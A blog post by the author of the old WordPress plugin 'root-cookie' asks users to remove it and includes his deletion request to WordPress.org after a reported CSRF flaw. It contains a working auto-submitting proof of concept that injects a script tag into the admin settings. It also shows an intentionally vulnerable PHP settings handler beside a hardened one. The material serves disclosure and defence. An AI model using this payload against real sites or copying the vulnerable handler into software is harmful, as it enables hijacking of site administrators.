TLDR:
🔥🔥🔥 If you still use root-cookie, please delete it from your WordPress/Website 🔥🔥🔥🔥
Today I have requested that the Plugins team over at WordPress.org delete my root-cookie plugin. I started it back in 2008 for WP 2.6, probably earlier if you dig into the SVN history, back when things were very different.
Back in the early days of WordPress, it was a "sub directory" install, i.e. you set up your site with a home page, and then WordPress (the blog) lived in a folder below that. The problem root-cookie was designed to solve is that there was no way of accessing the WordPress authentication cookie outside the WordPress folder, so if you wanted to do something as simple as change a banner or theme based on whether the visitor was logged in, you couldn't. root-cookie was very simple: it hooked into WordPress's authentication functions, stripped the folder out of the cookie path and assigned the cookie to the "root" of the domain, so that your custom code could read it and do whatever it needed.
I really, really cannot remember what the admin page did or looked like (there are probably some screenshots around here somewhere), but apparently it contains a Cross Site Request Forgery (CSRF) vulnerability. The steps to reproduce (apparently; I've not tested them) are:
Make a logged-in admin click a link to a page with the following HTML (replace the domain):
<!DOCTYPE html>
<html>
<body onload="document.forms[0].submit()">
<form action="http://{domain}/wp-admin/options-general.php?page=root-cookie" method="POST">
<input type="hidden" name="rootcookie_submit_hidden" value='Y' />
<input type="hidden" name="rootcookie_subdomain_manual" value='&"><script>alert(1)</script>' />
</form>
</body>
</html>
REF: https://patchstack.com/
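For anyone maintaining a similar settings page, here is an added example (not root-cookie's own code, which I don't have to hand) of the WordPress admin-page pattern that the PoC above relies on, beside a hardened version. It reuses the field names from the PoC; the function names, option key and nonce action are assumptions.

```php
<?php
// Added example, not the plugin's code. Field names come from the PoC above;
// function names, the option key and the nonce action are hypothetical.

// VULNERABLE: any POST that reaches the page is trusted, and the stored value is
// echoed back raw. A forged cross-site form can therefore change the option and
// plant script in the admin page in one request.
function rootcookie_settings_page_vulnerable() {
    if ( isset( $_POST['rootcookie_submit_hidden'] ) && $_POST['rootcookie_submit_hidden'] === 'Y' ) {
        update_option( 'rootcookie_subdomain_manual', $_POST['rootcookie_subdomain_manual'] );
    }
    $value = get_option( 'rootcookie_subdomain_manual', '' );
    echo '<form method="post">';
    echo '<input type="hidden" name="rootcookie_submit_hidden" value="Y" />';
    echo '<input type="text" name="rootcookie_subdomain_manual" value="' . $value . '" />';
    echo '<input type="submit" class="button-primary" value="Save" />';
    echo '</form>';
}

// HARDENED: require the capability, verify a nonce bound to this action (which a
// page on another origin cannot know), sanitize before storing, escape on output.
function rootcookie_settings_page_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.' ) );
    }
    if ( isset( $_POST['rootcookie_submit_hidden'] ) && $_POST['rootcookie_submit_hidden'] === 'Y' ) {
        // check_admin_referer() stops the request unless a valid nonce for this action is present.
        check_admin_referer( 'rootcookie_save_settings', 'rootcookie_nonce' );
        $clean = sanitize_text_field( wp_unslash( $_POST['rootcookie_subdomain_manual'] ) );
        update_option( 'rootcookie_subdomain_manual', $clean );
    }
    $value = get_option( 'rootcookie_subdomain_manual', '' );
    echo '<form method="post">';
    wp_nonce_field( 'rootcookie_save_settings', 'rootcookie_nonce' );
    echo '<input type="hidden" name="rootcookie_submit_hidden" value="Y" />';
    echo '<input type="text" name="rootcookie_subdomain_manual" value="' . esc_attr( $value ) . '" />';
    echo '<input type="submit" class="button-primary" value="Save" />';
    echo '</form>';
}
```

The hardened version rejects the PoC's forged POST at the nonce check, and even if a value were stored, esc_attr() keeps it from breaking out of the attribute when rendered.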
👉🏻 Given that I have not maintained this plugin for over 13 years, I do NOT intend to publish an update and have requested that the plugin be deleted.
From: Nick
To: plugins wordpress.org
Date: 14 Dec 2024, 15:47
Subject: Please Delete "root-cookie"
Body: Hello, please delete https://wordpress.org/plugins/root-cookie/
The plugin has not been maintained in 13 years. Apparently it was recently discovered to contain a CSRF vulnerability; I do not intend to fix it, therefore it would be safer for the community if the plugin is removed from wordpress.org.
Stats show only 11 downloads per week, so I don't suppose the plugin is needed anymore. The first version was released in 2008 for WP 2.6; I expect a lot has changed since then :)
Many Thanks in advance for your support.
Kind Regards,
Nick